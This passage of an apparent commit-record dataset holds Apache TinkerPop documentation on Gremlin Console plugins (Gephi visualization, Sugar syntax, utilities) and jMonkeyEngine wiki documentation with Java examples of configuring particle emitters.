{"message":"Error encountered evaluating script: divideIt(8, 2)"}
----

In the above REST-based requests, the bindings contain a special parameter that tells the `ScriptEngine` cache to
immediately forget the script after execution. In this way, the function does not end up being globally available.

[[gremlin-plugins]]
Gremlin Plugins
---------------

image:gremlin-plugin.png[width=125]

Plugins provide a way to expand the features of Gremlin Console and Gremlin Server. The following sections describe
the plugins that are available directly from TinkerPop. Please see the
link:http://tinkerpop.apache.org/docs/x.y.z/dev/provider/#gremlin-plugins[Provider Documentation] for information on
how to develop custom plugins.

[[credentials-plugin]]
Credentials Plugin
~~~~~~~~~~~~~~~~~~

image:gremlin-server.png[width=200,float=left] xref:gremlin-server[Gremlin Server] supports an authentication model
where user credentials are stored inside of a `Graph` instance. This database can be managed with the
xref:credentials-dsl[Credentials DSL], which can be installed in the console via the Credentials Plugin. This plugin
is packaged with the console, but is not enabled by default.

[source,groovy]
gremlin> :plugin use tinkerpop.credentials
==>tinkerpop.credentials activated

This plugin imports the appropriate classes for managing the credentials graph.

[[gephi-plugin]]
Gephi Plugin
~~~~~~~~~~~~

image:gephi-logo.png[width=200, float=left] link:http://gephi.github.io/[Gephi] is an interactive visualization,
exploration, and analysis platform for graphs. The link:https://marketplace.gephi.org/plugin/graph-streaming/[Graph Streaming]
plugin for Gephi provides an link:https://wiki.gephi.org/index.php/Graph_Streaming[API] that can be leveraged to
stream graphs and visualize traversals interactively through the Gremlin Gephi Plugin.

The following instructions assume that Gephi has been downloaded and installed. They further assume that the Graph
Streaming plugin has been installed (`Tools > Plugins`). The following instructions explain how to visualize a `Graph`
and `Traversal`.

In Gephi, create a new project with `File > New Project`. In the lower left view, click the "Streaming" tab, open the
Master drop down, and right click `Master Server > Start` which starts the Graph Streaming server in Gephi and by
default accepts requests at `http://localhost:8080/workspace0`:

image::gephi-start-server.png[width=800]

IMPORTANT: The Gephi Streaming Plugin doesn't detect port conflicts and will appear to start the plugin successfully
even if there is something already active on the port it wants to connect to (which is 8080 by default). Be sure
that there is nothing running on the port that Gephi will be using before starting the plugin. 
Failing to do\nthis produces behavior where the console will appear to submit requests to Gephi successfully but nothing will\nrender.\n\nStart the xref:gremlin-console[Gremlin Console] and activate the Gephi plugin:\n\n[gremlin-groovy]\n----\n:plugin use tinkerpop.gephi\ngraph = TinkerFactory.createModern()\n:remote connect tinkerpop.gephi\n:> graph\n----\n\nThe above Gremlin session activates the Gephi plugin, creates the \"modern\" `TinkerGraph`, uses the `:remote` command\nto set up a connection to the Graph Streaming server in Gephi (with default parameters that will be explained below),\nand then uses `:submit`, which sends the vertices and edges of the graph to the Gephi Streaming Server. The resulting\ngraph appears in Gephi as displayed in the left image below.\n\nimage::gephi-graph-submit.png[width=800]\n\nNOTE: Issuing `:> graph` again will clear the Gephi workspace and then re-write the graph. To manually empty the\nworkspace do `:> clear`.\n\nNow that the graph is visualized in Gephi, it is possible to link:https:\/\/gephi.github.io\/users\/tutorial-layouts\/[apply a layout algorithm],\nchange the size and\/or color of vertices and edges, and display labels\/properties of interest. Further information\ncan be found in Gephi's tutorial on link:https:\/\/gephi.github.io\/users\/tutorial-visualization\/[Visualization].\nAfter applying the Fruchterman Reingold layout, increasing the node size, decreasing the edge scale, and displaying\nthe id, name, and weight attributes, the graph looks as displayed in the right image above.\n\nVisualization of a `Traversal` takes a different approach, as the visualization occurs while the `Traversal` is executing,\nthus showing a real-time view of its execution. A `Traversal` must be \"configured\" to operate in this format and for\nthat it requires use of the `visualTraversal` option on the `config` function of the `:remote` command:\n\n[gremlin-groovy,modern]\n----\n:remote config visualTraversal graph <1>\ntraversal = vg.V(2).in().out('knows').\n has('age',gt(30)).outE('created').\n has('weight',gt(0.5d)).inV();null\n:> traversal <2>\n----\n\n<1> Configure a \"visual traversal\" from your \"graph\" - this must be a `Graph` instance.\n<2> Submit the `Traversal` to visualize to Gephi.\n\nWhen the `:>` line is called, each step of the `Traversal` that produces or filters vertices generates events to\nGephi. The events update the color and size of the vertices at that step with `startRGBColor` and `startSize`\nrespectively. After the first step visualization, it sleeps for the configured `stepDelay` in milliseconds. On the\nsecond step, it decays the configured `colorToFade` of all vertices visited in prior steps by\nmultiplying the current `colorToFade` value for each vertex with the `colorFadeRate`. Setting the `colorFadeRate`\nvalue to `1.0` will prevent the color decay. 
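For example (a worked illustration using the defaults listed in the table below), with `colorToFade` set to `g`, a `startRGBColor` of `[0.0,1.0,0.5]`, and a `colorFadeRate` of `0.7`, the green channel of a vertex visited on the first step decays to `0.7` after the second step, `0.49` after the third, and so on.\n\n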
The screenshots below show how the visualization evolves over the four\nsteps:\n\nimage::gephi-traversal.png[width=1200]\n\nTo get a sense of how the visualization configuration parameters affect the output, see the example below:\n\n[gremlin-groovy,modern]\n----\n:remote config startRGBColor [0.0,0.3,1.0]\n:remote config colorToFade b\n:remote config colorFadeRate 0.5\n:> traversal\n----\n\nimage::gephi-traversal-config.png[width=400]\n\nThe visualization configuration above now starts with a blue color (for the most recently visited vertices), fades the blue channel\n(so that dark green remains on the oldest visited), and fades it more quickly so that the gradient from dark\ngreen to blue across steps has higher contrast. The following table provides a more detailed description of the\nGephi plugin configuration parameters as accepted via the `:remote config` command:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Parameter |Description |Default\n|workspace |The name of the workspace for which your Graph Streaming server is started. |workspace0\n|host |The host on which the Graph Streaming server is running. |localhost\n|port |The port number of the URL that the Graph Streaming server is listening on. |8080\n|sizeDecrementRate |The rate at which the size of an element decreases on each step of the visualization. |0.33\n|stepDelay |The amount of time in milliseconds to pause between step visualizations. |1000\n|startRGBColor |A size 3 float array of RGB color values which defines the starting color applied to the most recently visited nodes. |[0.0,1.0,0.5]\n|startSize |The size an element should be when it is most recently visited. |20\n|colorToFade |A single char from the set `{r,g,b,R,G,B}` determining which color to fade for vertices visited in prior steps. |g\n|colorFadeRate |A float value in the range `(0.0,1.0]` which is multiplied against the current `colorToFade` value for prior vertices; a `1.0` value effectively turns off the color fading of vertices visited in prior steps. |0.7\n|visualTraversal |Creates a `TraversalSource` variable in the Console named `vg` which can be used for visualizing traversals. This configuration option takes two parameters. The first is required and is the name of the `Graph` instance variable that will generate the `TraversalSource`. The second parameter is the variable name that the `TraversalSource` should have when referenced in the Console. If left unspecified, this value defaults to `vg`.\n|=========================================================\n\n[[server-plugin]]\nServer Plugin\n~~~~~~~~~~~~~\n\nimage:gremlin-server.png[width=200,float=left] xref:gremlin-server[Gremlin Server] remotely executes Gremlin scripts\nthat are submitted to it. The Server Plugin provides a way to submit scripts to Gremlin Server for remote\nprocessing. Read more about the plugin and how it works in the Gremlin Server section on xref:connecting-via-console[Connecting via Console].\n\nNOTE: The Server Plugin is enabled in the Gremlin Console by default.\n\n[[sugar-plugin]]\nSugar Plugin\n~~~~~~~~~~~~\n\nimage:gremlin-sugar.png[width=120,float=left] In previous versions of Gremlin-Groovy, there were numerous\nlink:http:\/\/en.wikipedia.org\/wiki\/Syntactic_sugar[syntactic sugars] that users could rely on to make their traversals\nmore succinct. Unfortunately, many of these conventions made use of link:http:\/\/docs.oracle.com\/javase\/tutorial\/reflect\/[Java reflection]\nand thus were not performant. 
In TinkerPop3, these conveniences have been removed in favor of the standard\nGremlin-Groovy syntax, which is both in line with Gremlin-Java8 syntax and always the most performant\nrepresentation. However, for those users that would like to use the previous syntactic sugars (as well as new ones),\nthere is `SugarGremlinPlugin` (a.k.a. Gremlin-Groovy-Sugar).\n\nIMPORTANT: It is important that the sugar plugin is loaded in a Gremlin Console session prior to any manipulations of\nthe respective TinkerPop3 objects, as Groovy will cache unavailable methods and properties.\n\n[source,groovy]\n----\ngremlin> :plugin use tinkerpop.sugar\n==>tinkerpop.sugar activated\n----\n\nTIP: When using Sugar in a Groovy class file, add `static { SugarLoader.load() }` to the head of the file. Note that\n`SugarLoader.load()` will automatically call `GremlinLoader.load()`.\n\nGraph Traversal Methods\n^^^^^^^^^^^^^^^^^^^^^^^\n\nIf a `GraphTraversal` property is unknown and there is a corresponding method with said name off of `GraphTraversal`,\nthen the property is assumed to be a method call. This enables the user to omit `( )` from the method name. However,\nif the property does not reference a `GraphTraversal` method, then it is assumed to be a call to `values(property)`.\n\n[gremlin-groovy,modern]\n----\ng.V <1>\ng.V.name <2>\ng.V.outE.weight <3>\n----\n\n<1> There is no need for the parentheses in `g.V()`.\n<2> The traversal is interpreted as `g.V().values('name')`.\n<3> A chain of zero-argument step calls with a property value call.\n\nRange Queries\n^^^^^^^^^^^^^\n\nThe `[x]` and `[x..y]` range operators in Groovy translate to `RangeStep` calls.\n\n[gremlin-groovy,modern]\n----\ng.V[0..2]\ng.V[0..<2]\ng.V[2]\n----\n\nLogical Operators\n^^^^^^^^^^^^^^^^^\n\nThe `&` and `|` operators are overloaded in `SugarGremlinPlugin`. When used, they introduce the `AndStep` and `OrStep`\nmarkers into the traversal. See <<and-step,`and()`>> and <<or-step,`or()`>> for more information.\n\n[gremlin-groovy,modern]\n----\ng.V.where(outE('knows') & outE('created')).name <1>\nt = g.V.where(outE('knows') | inE('created')).name; null <2>\nt.toString()\nt\nt.toString()\n----\n\n<1> Introducing the `AndStep` with the `&` operator.\n<2> Introducing the `OrStep` with the `|` operator.\n\nTraverser Methods\n^^^^^^^^^^^^^^^^^\n\nIt is rare that a user will ever interact with a `Traverser` directly. However, if they do, some method redirects exist\nto make it easy.\n\n[gremlin-groovy,modern]\n----\ng.V().map{it.get().value('name')} \/\/ conventional\ng.V.map{it.name} \/\/ sugar\n----\n\n[[utilities-plugin]]\nUtilities Plugin\n~~~~~~~~~~~~~~~~\n\nThe Utilities Plugin provides various functions, helper methods, and imports of external classes that are useful in the console. \n\nNOTE: The Utilities Plugin is enabled in the Gremlin Console by default.\n\n[[benchmarking-and-profiling]]\nBenchmarking and Profiling\n^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nThe link:https:\/\/code.google.com\/p\/gperfutils\/[GPerfUtils] library provides a number of performance utilities for\nGroovy. Specifically, these tools cover benchmarking and profiling.\n\nBenchmarking allows execution time comparisons of different pieces of code. While such a feature is generally useful,\nin the context of Gremlin, benchmarking can help compare traversal performance times to determine the optimal\napproach. 
Profiling helps determine the parts of a program which are taking the most execution time, yielding\nlow-level insight into the code being examined.\n\n[gremlin-groovy,modern]\n----\n:plugin use tinkerpop.sugar \/\/ Activate sugar plugin for use in benchmark\nbenchmark{\n 'sugar' {g.V(1).name.next()}\n 'nosugar' {g.V(1).values('name').next()}\n}.prettyPrint()\nprofile { g.V().iterate() }.prettyPrint()\n----\n\n[[describe-graph]]\nDescribe Graph\n^^^^^^^^^^^^^^\n\nA good implementation of the Gremlin APIs will validate their features against the xref:validating-with-gremlin-test[Gremlin test suite].\nTo learn more about a specific implementation's compliance with the test suite, use the `describeGraph` function.\nThe following shows the output for `HadoopGraph`:\n\n[gremlin-groovy,modern]\n----\ndescribeGraph(HadoopGraph)\n----\n\n[[gremlin-archetypes]]\nGremlin Archetypes\n------------------\n\nTinkerPop has a number of link:https:\/\/maven.apache.org\/guides\/introduction\/introduction-to-archetypes.html[Maven archetypes],\nwhich provide example project templates to quickly get started with TinkerPop. The available archetypes are as follows:\n\n* `gremlin-archetype-server` - An example project that demonstrates the basic structure of a\n<<gremlin-server,Gremlin Server>> project, how to connect with the Gremlin Driver, and how to embed Gremlin Server in\na testing framework.\n* `gremlin-archetype-tinkergraph` - A basic example of how to structure a TinkerPop project with Maven.\n\nYou can use Maven to generate these example projects with a command like:\n\n[source,shell]\n$ mvn archetype:generate -DarchetypeGroupId=org.apache.tinkerpop -DarchetypeArtifactId=gremlin-archetype-server\n -DarchetypeVersion=x.y.z -DgroupId=com.my -DartifactId=app -Dversion=0.1 -DinteractiveMode=false\n\nThis command will generate a new Maven project in a directory called \"app\" with a `pom.xml` specifying a `groupId` of\n`com.my`. Please see the `README.asciidoc` in the root of each generated project for information on how to build and\nexecute it.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"82332fbadde9b58d4d14835432584ecc47a43617","subject":"fix image","message":"fix image\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/contributions\/pages\/effect\/particles\/particles.adoc","new_file":"docs\/modules\/contributions\/pages\/effect\/particles\/particles.adoc","new_contents":"= Next Generation Particle Emitters\n:revnumber: 2.0\n:revdate: 2020\/07\/25\n\n\nThis is a new particle system for jME3 posted for review and comments. 
This is an opportunity for people to comment on and request changes to the +++<abbr title=\"Application Programming Interface\">API<\/abbr>+++ or the internal functionality of the system.\nThe code for this particle system can be found at link:https:\/\/github.com\/jMonkeyEngine-Contributions\/ParticleController[jMonkeyEngine-Contributions].\n\nApologies for the slight jitter in some of the videos; the VideoRecorderState seems to be causing some issues which are not present when the application is running normally.\n\n\n== Credits\n\nThese particle emitters are inspired by and use some code from t0neg0d's particle emitters as described link:http:\/\/hub.jmonkeyengine.org\/t\/influencer-based-particleemitter-candidate-mesh-based-animated-particles\/25831[here].\n\nThose in turn were based on the original jME3 particle system by Kirill Vainer.\n\n\n== The Big Picture\n\nThe core of all Particle Emitters is a ParticleController. That is used to manage all of the particles; the behaviour of the particles themselves, though, is controlled through a number of other classes that are plugged in to the ParticleController to provide the required functionality. You can think of the ParticleController as providing the central hub into which you plug all the modules you need to get the desired behaviour.\n\nAn easy way to see what you need is to create a new ParticleController and then look at the constructor; you can see what parameters need to be supplied there.\n[cols=\"2\", options=\"header\"]\n|===\n\na| name\na| The name to use for the geometry in the scene graph\n\na| mesh\na| The mesh to use (usually either PointMesh or QuadMesh)\n\na| maxParticles\na| The maximum number of particles to allow active at any one time\n\na| lifeMin\na| The minimum amount of time (in seconds) for which each particle lives\n\na| lifeMax\na| The maximum amount of time (in seconds) for which each particle lives\n\na| source\na| The source from which the particles are spawned\n\na| emissionController\na| The frequency and timing with which particles are spawned. If null then no particles are automatically spawned and they must be triggered manually using emitNextParticle() or emitAllParticles().\n\na| influencers\na| Zero or more ParticleInfluencers, each of which changes the behaviour of the particles.\n\n|===\n\nBy selecting the behaviour you desire for each option you can configure a virtually infinite array of possible particle emitters.\n\nWe will now walk through some common examples and possible uses, and then in the end we will document all of the possible choices for these options.\n\nFor a full reference of the standard options available see the xref:effect\/particles\/reference.adoc[Reference Page].\n\n\n== Simple Fire\n\n[source,java]\n----\n\n\npublic class HelloParticles1_SimpleFire extends SimpleApplication {\n\n public static void main(String[] args){\n HelloParticles1_SimpleFire app = new HelloParticles1_SimpleFire();\n app.start(); \/\/ start the game\n }\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limited mesh type) with the specified\n\/\/ image (from jME3-testdata). 
The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Effects\/Explosion\/flame.png\", 2, 2),\n\/\/ Allow at most 32 particles at any time\n 32,\n\/\/ Particles last for at least 2 seconds\n 2,\n\/\/ And at most 3 seconds\n 3,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-3, 0, -3), new Vector3f(3, 0, 3)),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(10),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.5 units, end with a size of 0.1\n new SizeInfluencer(0.5f, 0.1f),\n\/\/ Particles start yellow full opacity and fade towards red with very low opacity\n new ColorInfluencer(new ColorRGBA(1,1,0.2f,1), new ColorRGBA(1,0,0,0.1f)),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new PreferredDirectionInfluencer(new Vector3f(0, 1, 0), 0.25f));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n }\n}\n\n----\n\nRun that and the result should look something like:\n\nimage:effect\/particles\/particles1.jpg[particles1.jpg,width=\"\",height=\"\"]\n\n\n== Simple Fire and Smoke\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limited mesh type) with the specified\n\/\/ image (from jME3-testdata). 
The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Effects\/Explosion\/flame.png\", 2, 2),\n\/\/ Allow at most 50 particles at any time, the particles are lasting longer this time\n\/\/ so we need to allow more on screen at once\n 50,\n\/\/ Particles last for at least 4 seconds\n 4,\n\/\/ And at most 5 seconds\n 5,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-3, 0, -3), new Vector3f(3, 0, 3)),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(10),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.5 units, end with a size of 0.25\n new SizeInfluencer(0.5f, 0.25f),\n\/\/ Particles start yellow full opacity and fade towards red with very low opacity\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 0.1f, 1)),\n new MultiColorInfluencer.Stage(0.15f, new ColorRGBA(1, 0, 0, 0.25f)),\n new MultiColorInfluencer.Stage(0.3f, new ColorRGBA(1f, 1f, 1f, 0.5f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1f,1f,1f,0f))\n ),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new PreferredDirectionInfluencer(new Vector3f(0, 1, 0), 0.25f));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n }\n\n----\n\nYou can see that the only change is to make the particles last a little longer and to change the ColorInfluencer for a MultiColorInfluencer, and yet the results look quite different:\n\nimage:effect\/particles\/particles2.jpg[particles2.jpg,width=\"\",height=\"\"]\n\nThis isn't a very convincing fire yet, but it is very simple to get up and running. One problem with this approach is that particles are rendered using an alpha-additive material, so they can only make things brighter but never darker. That is not ideal for smoke, which should be able to make things darker too. We will look at this again later, but for now we will move on to some different mesh types.\n\n\n== Quad Meshes and Billboarding\n\nPoint Meshes are extremely fast, but they have a number of limitations. The main ones are that the sprites must always be facing towards the screen and that on certain graphics cards the maximum number of pixels a sprite can occupy on the screen is limited.\n\nWhile PointMesh is recommended for basic particles, for more advanced options there is the QuadMesh, which constructs each particle using a quad and as a result can allow any size on the screen and any orientation. The following example combines two separate particle emitters to produce a spell-like effect.\n\n\n[NOTE]\n====\n\nThe flame image from before is used for the second emitter; the first emitter uses this image, which you can download and use:\n\nimage:effect\/particles\/runecircle.png[runecircle.png,width=\"256\",height=\"\"]\n\n====\n\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController to provide the actual spell runes effect\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SpellRunes\",\n\/\/ Use a Quad Mesh; this image is available for download on this page. The texture file contains\n\/\/ a single image so there are no sprite columns and rows to set up. 
The BillboardStrategy is how\n\/\/ the particles should be oriented; in this case it uses the particle rotation.\n new QuadMesh(QuadMeshBillboardStrategy.USE_PARTICLE_ROTATION, assetManager, \"Textures\/runeCircle.png\"),\n\/\/ Allow at most 9 particles at any time\n 9,\n\/\/ Particles always last for 4 seconds\n 4,\n 4,\n\/\/ We want to generate all particles from the same location with the same velocity.\n new PointSource(new Vector3f(0, 1f, 0), new Vector3f(0, 1f, 0)),\n\/\/ Emit particles at regular intervals, 2 particles every second\n new RegularEmission(2),\n\/\/ ** Influencers start here\n\/\/ These particles should be size 3 and stay the same size\n new SizeInfluencer(3, 3),\n\/\/ Start the particles at full opacity blue and then fade them out to 0 opacity cyan.\n new ColorInfluencer(ColorRGBA.Blue, new ColorRGBA(0, 1, 1, 0)),\n\/\/ Rotate all particles by the same amount. The units are radians-per-second\n new RotationInfluencer(\n new Vector3f(0, FastMath.QUARTER_PI, 0),\n new Vector3f(0, FastMath.QUARTER_PI, 0), false));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n\/\/ Construct a new ParticleController to provide the central glow effect\n pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SpellBase\",\n\/\/ Use a simple point mesh (the fastest but most limited mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n\/\/ Allow at most 76 particles at any time\n 76,\n\/\/ Particles last for at least 5 seconds\n 5,\n\/\/ And at most 5 seconds\n 5,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-1f, 0, -1f), new Vector3f(1f, 0.5f, 1f)),\n\/\/ Emit particles at regular intervals, 15 particles every second\n new RegularEmission(15),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start red with some blue and green and fade towards blue zero opacity\n\/\/ Because particles are rendered using an additive blend, any area where a lot\n\/\/ of particles overlap will end up white.\n new ColorInfluencer(new ColorRGBA(1,0.25f,0.25f,0.25f), new ColorRGBA(0,0,1,0f)));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n cam.setLocation(new Vector3f(0, 10, -10));\n cam.lookAt(Vector3f.ZERO, Vector3f.UNIT_Y);\n }\n\n\n----\n\nThe result should look something like:\n\n* link:https:\/\/www.youtube.com\/watch?v=_Spjqag99HY[Video: Particle Emitter Example 1]\n\n\n== Using a mesh as the particle source\n\nThere is a model of a monkey's head in the test data that is used in this example, although you can use any other model you like. 
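(The fire emitter further below passes a `Geometry` variable named `g` to its `MeshSource`. Once the model has been loaded as shown in the next listing, a minimal sketch of obtaining `g` could look like this, where the child index is an assumption that depends on the structure of the model you actually use.)\n\n[source,java]\n----\n\/\/ Hypothetical lookup: assumes the head mesh is the first child of the\n\/\/ loaded node; adjust the index, or look the child up by name, for other models.\nGeometry g = (Geometry) monkey.getChild(0);\n----\n\n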
Just make sure you can find the geometry within whichever model you use, as it is needed for the next step.\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n Node monkey = (Node) assetManager.loadModel(\"Models\/MonkeyHead\/MonkeyHead.mesh.xml\");\n rootNode.attachChild(monkey);\n\n DirectionalLight dl = new DirectionalLight();\n dl.setDirection(new Vector3f(-0.1f,-0.7f,-1).normalizeLocal());\n dl.setColor(new ColorRGBA(0.88f, 0.60f, 0.60f, 1.0f));\n rootNode.addLight(dl);\n\n AmbientLight al = new AmbientLight();\n al.setColor(ColorRGBA.White);\n rootNode.addLight(al);\n...\n}\n----\n\nThe result should look something like:\n\nimage:effect\/particles\/particles3.jpg[particles3.jpg,width=\"\",height=\"\"]\n\nNow let's set fire to the monkey! (No monkeys were harmed during the making of this particle system!)\n\n[source,java]\n----\n\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limited mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n\/\/ Allow at most 1200 particles at any time, the particles are lasting longer this time\n\/\/ so we need to allow more on screen at once\n 1200,\n\/\/ Particles last for at least 4 seconds\n 4,\n\/\/ And at most 5 seconds\n 5,\n\/\/ A MeshSource scans a geometry and picks a random point on the surface of that\n\/\/ geometry in order to emit the particle from it. The particle has an initial velocity\n\/\/ of 1wu\/s along the normal of the triangle from which it is emitted.\n new MeshSource(g),\n\/\/ Emit particles at regular intervals, 240 particles every second\n new RegularEmission(240),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.1 units, end with a size of 0.15\n new SizeInfluencer(0.1f, 0.15f),\n\/\/ Particles have a constant speed of 0.25f; this will modify the original speed\n\/\/ from the emitter and then allow the GravityInfluencer to change the direction\n\/\/ of motion but constrain the speed\n new SpeedInfluencer(0.25f, 0.25f),\n\/\/ Fade the particles through a range of colours\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 0.1f, 1)),\n new MultiColorInfluencer.Stage(0.25f, new ColorRGBA(1, 0, 0, 0.25f)),\n new MultiColorInfluencer.Stage(0.5f, new ColorRGBA(1f, 1f, 1f, 0.25f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1f,1f,1f,0f))\n ),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new GravityInfluencer(new Vector3f(0, 0.5f, 0)));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n----\n\nAgain, this is just a very simple example; much more sophisticated fire effects are possible with the use of the right textures and mixture of emitters and influencers. The result though should look something like this:\n\n* link:https:\/\/www.youtube.com\/watch?v=W__zGJHZ2AU[Video: Particle Emitter Example 2]\n\n\n== Meshes and Weighted Meshes\n\nThe previous example uses a MeshSource, which picks a random triangle from the mesh without any regard given to the size of different triangles. 
This means areas with small triangles are actually more likely to emit particles than areas with large triangles. For most meshes this is not visible; however, there is a WeightedMeshSource available should this be a problem.\n\nThe WeightedMeshSource scans the mesh and works out a weight for each triangle based on its relative size, so that the result is an even spread of particles even with very large differences in triangle sizes. There are some limitations with this though:\n\n. The WeightedMeshSource consumes more memory as it needs to remember the weights\n. The WeightedMeshSource is slower as it needs to do more work to pick a triangle\n. The WeightedMeshSource does not update automatically if the mesh changes: if triangles are added they will not emit, and if triangles are removed it could cause a crash. If triangles change shape then the weights are not updated.\n\nThere is a method available to cause the weights to be recalculated, which can be used when changing the mesh, but if possible a non-weighted MeshSource should be used for dynamic meshes.\n\n\n== 3d Particles - TemplateMesh\n\nThe previous mesh examples all use simple 2d quads to display images. There is another mesh type though, the TemplateMesh, which allows fully featured 3d particles to be used.\n\n\n[NOTE]\n====\n\nThere is a rock texture available in the jME3 test data, or you can substitute any other suitable texture. The model for this example is: link:http:\/\/www.zero-separation.com\/particles\/FracturedCube.j3o[FracturedCube.j3o]\n\n====\n\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n \/\/ Since we actually use a full lit material for these particles we need\n \/\/ to add a light to the scene in order to see anything.\n DirectionalLight dl = new DirectionalLight();\n dl.setDirection(new Vector3f(-0.1f,-0.7f,-1).normalizeLocal());\n dl.setColor(new ColorRGBA(0.6f, 0.60f, 0.60f, 1.0f));\n rootNode.addLight(dl);\n\n\/\/ A standard lit material is used; this rock texture was taken from the\n\/\/ jme3 test data, but you can easily substitute your own.\n Material rock = new Material(assetManager, \"Common\/MatDefs\/Light\/Lighting.j3md\");\n rock.setTexture(\"DiffuseMap\", assetManager.loadTexture(\"Textures\/Rock.PNG\"));\n rock.setFloat(\"Shininess\", 100f);\n\n\/\/ A PointSource is actually a fully featured Spatial object; in this case\n\/\/ we simply adjust its translation, but it can actually be attached to the\n\/\/ scene graph and the source will automatically move as the Node to which\n\/\/ it is attached is transformed.\n PointSource source = new PointSource(new Vector3f(-5,-5,-5), new Vector3f(5,5,5));\n source.setLocalTranslation(0, 10, -20);\n\n\/\/ A TemplateMesh uses any number of standard meshes to be the template for\n\/\/ each 3d particle. This model was generated simply by taking a cube in\n\/\/ Blender and running a fracture script on it to generate 20 fragments.\n Node n = (Node) assetManager.loadModel(\"Models\/FracturedCube.j3o\");\n Mesh[] templates = new Mesh[n.getChildren().size()];\n int i = 0;\n for (Spatial s: n.getChildren()) {\n Geometry g = (Geometry)((Node)s).getChild(0);\n templates[i++] = g.getMesh();\n }\n\n\/\/ Construct the new particle controller\n ParticleController rockCtrl = new ParticleController(\n \"TemplateMesh\",\n\/\/ The TemplateMesh uses the rock material we created previously; the two boolean\n\/\/ flags say that we are not interested in vertex colours but we do want the vertex\n\/\/ normals. 
The array of meshes extracted from the model is then passed in to use\n\/\/ as models for each particle.\n new TemplateMesh(rock, false, true, templates),\n\/\/ A maximum of 64 particles at once, each lasting for 5 to 5.5 seconds.\n 64,\n 5,\n 5.5f,\n\/\/ Particles are emitted from the source that we created and positioned earlier\n source,\n\/\/ Emit 8 particles per second\n new RegularEmission(8),\n\/\/ The \"sprites\" in this case are the available templates. The TemplateMesh has\n\/\/ one spriteColumn for each template it has been provided, so the standard\n\/\/ RandomSpriteInfluencer just causes one to be picked at random each time a\n\/\/ particle is emitted.\n new RandomSpriteInfluencer(),\n\/\/ Rocks fall.\n new GravityInfluencer(new Vector3f(0, -4, 0)),\n\/\/ Rocks spin.\n new RotationInfluencer(new Vector3f(-2, -2, -2), new Vector3f(2, 2, 2), false));\n\n rootNode.attachChild(rockCtrl.getGeometry());\n }\n\n----\n\nThe result should look like:\n\n* link:https:\/\/www.youtube.com\/watch?v=a7y53UF8Giw[Video: Particle Emitter Example 3]\n\nAny number and mixture of models can be used, although as it is all a single mesh the same material must be used for all of them. It is recommended to keep a similar number of vertices for each of the models but that is not a strict requirement.\n\n\n== Emitting Particles from Particles\n\nTo add more dramatic effects you sometimes want to emit particles from particles; this could be done simply by attaching a MeshSource for the second controller to the mesh from the first controller. There are a number of limitations to this approach though, which will be demonstrated now:\n\nAdding the following 